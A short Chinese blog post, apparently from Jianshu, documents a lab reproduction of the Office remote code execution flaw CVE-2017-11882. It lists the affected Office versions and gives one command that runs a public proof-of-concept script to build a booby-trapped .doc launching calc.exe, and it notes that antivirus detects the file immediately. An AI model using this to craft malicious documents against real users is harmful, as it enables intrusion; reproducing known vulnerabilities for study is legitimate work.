登录注册写文章

office远程代码执行(CVE-2017-11882)

office远程代码执行(CVE-2017-11882)

office远程代码执行(CVE-2017-11882)

影响版本：

MicrosoftOffice 2000

MicrosoftOffice 2003

MicrosoftOffice 2007 Service Pack 3

MicrosoftOffice 2010 Service Pack 2

MicrosoftOffice 2013 Service Pack 1

MicrosoftOffice 2016

1. 生成含有恶意代码的POC

python2 .\Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe"-o test.doc

image

然而并没什么卵用，生成完刚一打开，就被火绒检测出来了，windows defender都不用打开，直接查杀了。。。。。

image

©著作权归作者所有,转载或内容合作请联系作者
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

推荐阅读更多精彩内容

Office远程代码执行漏洞（CVE-2017-11882）复现
转载：撰写人：fox-yu http://www.cnblogs.com/fox-yu/昨晚看到的有复现的文章，...
十八度的帝都阅读 732评论 0赞 0
Office远程代码执行漏洞（CVE-2017-11882）复现
1.今天看到有复现的文章，看了好几篇决定本地测试该漏洞利用工具清单： a) tcp反弹：kali 172.16....
二潘阅读 2,654评论 0赞 0
[漏洞复现] Office远程代码执行漏洞(CVE-2017-11882)
漏洞复现漏洞概述：此漏洞是由Office软件里面的 [公式编辑器] 造成的，由于编辑器进程没有对名称长度进行校...
JasonChiu17阅读 1,972评论 0赞 3
ReactiveCocoa(上)
在RAC中最核心的类RACSiganl,搞定这个类就能用ReactiveCocoa开发了。 RACSiganl:信...
Harely阅读 189评论 0赞 0
别再怀念过去，过去里面的人都没空等你
路同学失恋了，打电话来喊我陪她去酒馆喝两杯。路同学常称呼我为“知心大妈”，而我则喊她“牛排。” 我刚进酒馆的门，...
明天星期八阅读 309评论 0赞 0

赞1赞

赞赏

手机看全文